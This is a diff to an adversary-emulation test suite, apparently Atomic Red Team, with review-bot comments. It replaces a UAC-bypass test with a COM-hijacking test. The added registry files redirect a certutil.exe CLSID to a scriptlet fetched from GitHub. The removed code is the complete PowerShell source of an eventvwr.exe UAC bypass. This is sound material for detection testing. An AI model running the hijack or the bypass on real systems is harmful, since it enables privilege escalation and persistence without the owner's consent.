diff --git a/atomics/T1122/T1122.md b/atomics/T1122/T1122.md
index ae2a67e3..eb3d5540 100644
--- a/atomics/T1122/T1122.md
+++ b/atomics/T1122/T1122.md
@@ -16,19 +16,21 @@ Contributors: ENDGAME
## Atomic Tests
-- [Atomic Test #1 - PowerShell UAC Bypass](#atomic-test-1---powershell-uac-bypass)
+- [Atomic Test #1 - Component Object Model Hijacking](#atomic-test-1---component-object-model-hijacking)
-## Atomic Test #1 - PowerShell UAC Bypass
-PowerShell EventViewer Bypass by Matt Nelson
+## Atomic Test #1 - Component Object Model Hijacking
+Hijack COM Object used by certutil.exe
**Supported Platforms:** Windows
-#### Run it with `powershell`!
+#### Run it with `command_prompt`!
```
-Invoke-EventVwrBypass.ps1
+reg import ..\src\COMHijack.reg
+certutil.exe -CAInfo
+reg import ..\src\COMHijackCleanup.reg
```
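Review bot: the command block's `..\src\COMHijack.reg` path only resolves when the working directory is a sibling of `src` (for example the `atomics/T1122` folder itself), but nothing in the test says where it is expected to run from; state the required working directory in the description or reference the .reg files relative to the atomics folder so the three `reg import` / `certutil.exe -CAInfo` lines work from the executor's default location.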
diff --git a/atomics/T1122/T1122.yaml b/atomics/T1122/T1122.yaml
index 1f61424c..e9963d3e 100644
--- a/atomics/T1122/T1122.yaml
+++ b/atomics/T1122/T1122.yaml
@@ -1,15 +1,17 @@
---
attack_technique: T1122
-display_name: Bypass User Account Control
+display_name: Component Object Model Hijacking
atomic_tests:
-- name: PowerShell UAC Bypass
+- name: Component Object Model Hijacking
description: |
- PowerShell EventViewer Bypass by Matt Nelson
+ Hijack COM Object used by certutil.exe
supported_platforms:
- windows
executor:
- name: powershell
+ name: command_prompt
command: |
- Invoke-EventVwrBypass.ps1
+ reg import ..\src\COMHijack.reg
+ certutil.exe -CAInfo
+ reg import ..\src\COMHijackCleanup.reg
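Review bot: the one-line description "Hijack COM Object used by certutil.exe" omits two things a defender running this needs to know: that the hijack resolves through a `ScriptletURL` pointing at raw.githubusercontent.com (see COMHijack.reg), so the test needs outbound HTTPS and otherwise fails silently, and that the third command is the cleanup step that removes the registry keys. Spell both out in `description`, and name which COM object certutil.exe loads so the TreatAs redirect on CLSID {372FCE38-4324-11D0-8810-00A0C903B83C} is explained rather than left implicit.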
diff --git a/atomics/T1122/src/AtomicRedTeam.sct b/atomics/T1122/src/AtomicRedTeam.sct
new file mode 100755
index 00000000..161843f9
--- /dev/null
+++ b/atomics/T1122/src/AtomicRedTeam.sct
@@ -0,0 +1,25 @@
+
+
+
+
+
+
+
+
+
+
+
+
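Review bot: as rendered in this diff, all 25 added lines of AtomicRedTeam.sct are blank, so the scriptlet that the hijacked CLSID would load via scrobj.dll cannot be reviewed here; confirm the committed file actually contains the scriptlet XML, and document in the test description what the scriptlet does when certutil.exe triggers it, since that is the observable the detection engineer will be looking for.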
diff --git a/atomics/T1122/src/COMHijack.reg b/atomics/T1122/src/COMHijack.reg
new file mode 100755
index 00000000..f5b2cd62
--- /dev/null
+++ b/atomics/T1122/src/COMHijack.reg
@@ -0,0 +1,23 @@
+Windows Registry Editor Version 5.00
+[HKEY_CURRENT_USER\SOFTWARE\Classes\AtomicRedTeam.1.00]
+@="AtomicRedTeam"
+[HKEY_CURRENT_USER\SOFTWARE\Classes\AtomicRedTeam.1.00\CLSID]
+@="{00000001-0000-0000-0000-0000FEEDACDC}"
+[HKEY_CURRENT_USER\SOFTWARE\Classes\AtomicRedTeam]
+@="AtomicRedTeam"
+[HKEY_CURRENT_USER\SOFTWARE\Classes\AtomicRedTeam\CLSID]
+@="{00000001-0000-0000-0000-0000FEEDACDC}"
+[HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\{00000001-0000-0000-0000-0000FEEDACDC}]
+@="AtomicRedTeam"
+[HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\{00000001-0000-0000-0000-0000FEEDACDC}\InprocServer32]
+@="C:\\WINDOWS\\system32\\scrobj.dll"
+"ThreadingModel"="Apartment"
+[HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\{00000001-0000-0000-0000-0000FEEDACDC}\ProgID]
+@="AtomicRedTeam.1.00"
+[HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\{00000001-0000-0000-0000-0000FEEDACDC}\ScriptletURL]
+@="https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/Windows/Payloads/COMHijackScripts/AtomicRedTeam.sct"
+[HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\{00000001-0000-0000-0000-0000FEEDACDC}\VersionIndependentProgID]
+@="AtomicRedTeam"
+[HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\{372FCE38-4324-11D0-8810-00A0C903B83C}]
+[HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\{372FCE38-4324-11D0-8810-00A0C903B83C}\TreatAs]
+@="{00000001-0000-0000-0000-0000FEEDACDC}"
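Review bot: the `ScriptletURL` value points at `Windows/Payloads/COMHijackScripts/AtomicRedTeam.sct` on the master branch, but this commit adds the scriptlet at `atomics/T1122/src/AtomicRedTeam.sct`; the two paths do not match, so the hijack will load whatever happens to live at the old URL (or nothing) rather than the file being reviewed. Point `ScriptletURL` at the local file (a `file:///` path under the atomics folder) or at the path this commit actually adds, so the test is self-contained and reproducible offline.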
diff --git a/atomics/T1122/src/COMHijackCleanup.reg b/atomics/T1122/src/COMHijackCleanup.reg
new file mode 100755
index 00000000..1313fad6
--- /dev/null
+++ b/atomics/T1122/src/COMHijackCleanup.reg
@@ -0,0 +1,5 @@
+Windows Registry Editor Version 5.00
+[-HKEY_CURRENT_USER\SOFTWARE\Classes\AtomicRedTeam.1.00]
+[-HKEY_CURRENT_USER\SOFTWARE\Classes\AtomicRedTeam]
+[-HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\{00000001-0000-0000-0000-0000FEEDACDC}]
+[-HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\{372FCE38-4324-11D0-8810-00A0C903B83C}]
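Review bot: the last line deletes the entire `HKCU\SOFTWARE\Classes\CLSID\{372FCE38-4324-11D0-8810-00A0C903B83C}` key rather than just the `TreatAs` subkey that COMHijack.reg added; if a user-level registration for that CLSID already existed before the test, cleanup removes it instead of restoring it. Either restrict the deletion to `[-HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\{372FCE38-4324-11D0-8810-00A0C903B83C}\TreatAs]` or add a `reg export` of the key before import and note the precondition in the test description.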
diff --git a/atomics/T1122/src/Invoke-EventVwrBypass.ps1 b/atomics/T1122/src/Invoke-EventVwrBypass.ps1
deleted file mode 100644
index 4c119b03..00000000
--- a/atomics/T1122/src/Invoke-EventVwrBypass.ps1
+++ /dev/null
@@ -1,92 +0,0 @@
-function Invoke-EventVwrBypass {
-<#
-.SYNOPSIS
-
-Bypasses UAC by performing an image hijack on the .msc file extension
-Expected to work on Win7, 8.1 and Win10
-
-Only tested on Windows 7 and Windows 10
-
-Author: Matt Nelson (@enigma0x3)
-License: BSD 3-Clause
-Required Dependencies: None
-Optional Dependencies: None
-
-Source: https://enigma0x3.net/2016/08/15/fileless-uac-bypass-using-eventvwr-exe-and-registry-hijacking/
-
-.PARAMETER Command
-
- Specifies the command you want to run in a high-integrity context. For example, you can pass it powershell.exe followed by any encoded command "powershell -enc "
-
-.EXAMPLE
-
-Invoke-EventVwrBypass -Command "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -enc 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"
-
-This will write out "Is Elevated: True" to C:\UACBypassTest.
-
-#>
-
- [CmdletBinding(SupportsShouldProcess = $True, ConfirmImpact = 'Medium')]
- Param (
- [Parameter(Mandatory = $True)]
- [ValidateNotNullOrEmpty()]
- [String]
- $Command,
-
- [Switch]
- $Force
- )
- $ConsentPrompt = (Get-ItemProperty HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System).ConsentPromptBehaviorAdmin
- $SecureDesktopPrompt = (Get-ItemProperty HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System).PromptOnSecureDesktop
-
- if($ConsentPrompt -Eq 2 -And $SecureDesktopPrompt -Eq 1){
- "UAC is set to 'Always Notify'. This module does not bypass this setting."
- exit
- }
- else{
- #Begin Execution
- $mscCommandPath = "HKCU:\Software\Classes\mscfile\shell\open\command"
- $Command = $pshome + '\' + $Command
- #Add in the new registry entries to hijack the msc file
- if ($Force -or ((Get-ItemProperty -Path $mscCommandPath -Name '(default)' -ErrorAction SilentlyContinue) -eq $null)){
- New-Item $mscCommandPath -Force |
- New-ItemProperty -Name '(Default)' -Value $Command -PropertyType string -Force | Out-Null
- }else{
- Write-Warning "Key already exists, consider using -Force"
- exit
- }
-
- if (Test-Path $mscCommandPath) {
- Write-Verbose "Created registry entries to hijack the msc extension"
- }else{
- Write-Warning "Failed to create registry key, exiting"
- exit
- }
-
- $EventvwrPath = Join-Path -Path ([Environment]::GetFolderPath('System')) -ChildPath 'eventvwr.exe'
- #Start Event Viewer
- if ($PSCmdlet.ShouldProcess($EventvwrPath, 'Start process')) {
- $Process = Start-Process -FilePath $EventvwrPath -PassThru
- Write-Verbose "Started eventvwr.exe"
- }
-
- #Sleep 5 seconds
- Write-Verbose "Sleeping 5 seconds to trigger payload"
- if (-not $PSBoundParameters['WhatIf']) {
- Start-Sleep -Seconds 5
- }
-
- $mscfilePath = "HKCU:\Software\Classes\mscfile"
-
- if (Test-Path $mscfilePath) {
- #Remove the registry entry
- Remove-Item $mscfilePath -Recurse -Force
- Write-Verbose "Removed registry entries"
- }
-
- if(Get-Process -Id $Process.Id -ErrorAction SilentlyContinue){
- Stop-Process -Id $Process.Id
- Write-Verbose "Killed running eventvwr process"
- }
- }
-}
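Review bot: deleting this script is the right call for T1122, since the eventvwr.exe `.msc` image hijack it performs is a UAC bypass and not COM hijacking, but the commit drops that coverage without saying where it goes; reference the Bypass User Account Control technique that previously carried the `display_name` so the test is re-homed rather than lost, and keep Matt Nelson's attribution with it.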
diff --git a/atomics/T1122/src/test.bat b/atomics/T1122/src/test.bat
new file mode 100755
index 00000000..06638ea6
--- /dev/null
+++ b/atomics/T1122/src/test.bat
@@ -0,0 +1,3 @@
+reg import COMHijack.reg
+certutil.exe -CAInfo
+reg import COMHijackCleanup.reg
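Review bot: test.bat imports `COMHijack.reg` from the current directory while T1122.yaml and T1122.md use `..\src\COMHijack.reg`, so the two entry points assume different working directories and at most one of them works from a given location; nothing in the YAML references test.bat either. Either make the YAML `command` invoke this batch file from `src`, or drop test.bat and keep the YAML as the single source of truth, so the README, the executor and the helper script agree on paths.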
diff --git a/atomics/index.md b/atomics/index.md
index 31a1876e..39532164 100644
--- a/atomics/index.md
+++ b/atomics/index.md
@@ -28,7 +28,7 @@
- Atomic Test #1: Change Default File Association [windows]
- T1109 Component Firmware [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1122 Component Object Model Hijacking](./T1122/T1122.md)
- - Atomic Test #1: PowerShell UAC Bypass [windows]
+ - Atomic Test #1: Component Object Model Hijacking [windows]
- [T1136 Create Account](./T1136/T1136.md)
- Atomic Test #1: Create a user account on a Linux system [linux]
- Atomic Test #2: Create a user account on a MacOS system [macos]
@@ -141,7 +141,7 @@
- T1116 Code Signing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1109 Component Firmware [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1122 Component Object Model Hijacking](./T1122/T1122.md)
- - Atomic Test #1: PowerShell UAC Bypass [windows]
+ - Atomic Test #1: Component Object Model Hijacking [windows]
- T1196 Control Panel Items [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1207 DCShadow](./T1207/T1207.md)
- Atomic Test #1: DCShadow - Mimikatz [windows]
diff --git a/atomics/windows-index.md b/atomics/windows-index.md
index e07ff70c..371590a3 100644
--- a/atomics/windows-index.md
+++ b/atomics/windows-index.md
@@ -13,7 +13,7 @@
- T1116 Code Signing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1109 Component Firmware [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1122 Component Object Model Hijacking](./T1122/T1122.md)
- - Atomic Test #1: PowerShell UAC Bypass [windows]
+ - Atomic Test #1: Component Object Model Hijacking [windows]
- T1196 Control Panel Items [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1207 DCShadow](./T1207/T1207.md)
- Atomic Test #1: DCShadow - Mimikatz [windows]
@@ -167,7 +167,7 @@
- Atomic Test #1: Change Default File Association [windows]
- T1109 Component Firmware [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1122 Component Object Model Hijacking](./T1122/T1122.md)
- - Atomic Test #1: PowerShell UAC Bypass [windows]
+ - Atomic Test #1: Component Object Model Hijacking [windows]
- [T1136 Create Account](./T1136/T1136.md)
- Atomic Test #3: Create a new user in a command prompt [windows]
- Atomic Test #4: Create a new user in PowerShell [windows]